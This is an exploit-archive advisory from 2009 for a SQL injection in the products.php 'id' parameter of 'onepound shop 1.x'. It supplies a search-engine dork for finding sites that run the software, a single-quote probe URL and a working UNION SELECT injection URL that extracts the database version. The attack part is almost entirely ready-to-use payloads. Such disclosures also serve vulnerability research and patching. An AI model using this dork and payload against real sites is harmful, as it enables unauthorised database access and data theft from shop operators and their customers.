[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : onepound shop 1.x products.php SQL Injection Vulnerability
# Published : 2009-07-13
# Author : Affix
# Previous Title : MDPro Module CWGuestBook <= 2.1 Remote SQL Injection Vulnerability
# Next Title : Censura 1.16.04 (bSQL/XSS) Multiple Remote Vulnerabilities


#################################################################
#		      _______ _________ _       		#
#		     (  ____ )__   __/( (    /|		#
#		     | (    )|   ) (   |    ( |		#
#		     | (____)|   | |   |    | |		#
#		     |     __)   | |   | ( ) |		#
#		     | ( (      | |   | |    |		#
#		     | )  __   | |   | )    |		#
#		     |/   __/   )_(   |/    )_)		#
#                        http://root-the.net 			#
#################################################################
#[+] onepund shop 1.x products.php SQL Injection Vulnerability  #
#[+] Vendor : onepound.cn <ttp://www.onepound.cn/>              #
#[+] Exploit : Affix <root@root-the.net>			#
#[+] Greetz : Mad-Hatter, Atomiku, RTN, Terogen, SCD, Boxhead,  #
#	      str0ke, tekto, SonicX, Android, tw0		#
#[+] dork : "Powered by OnePound"				#
#################################################################

Example :
   http://site.com/products.php?id='

Demo :
   http://site.com/products.php?id=-9+UNION+SELECT+1,2,version%28%29,4,5,6,7,8,9,10,11,12,13--

# www.Syue.com [2009-07-13]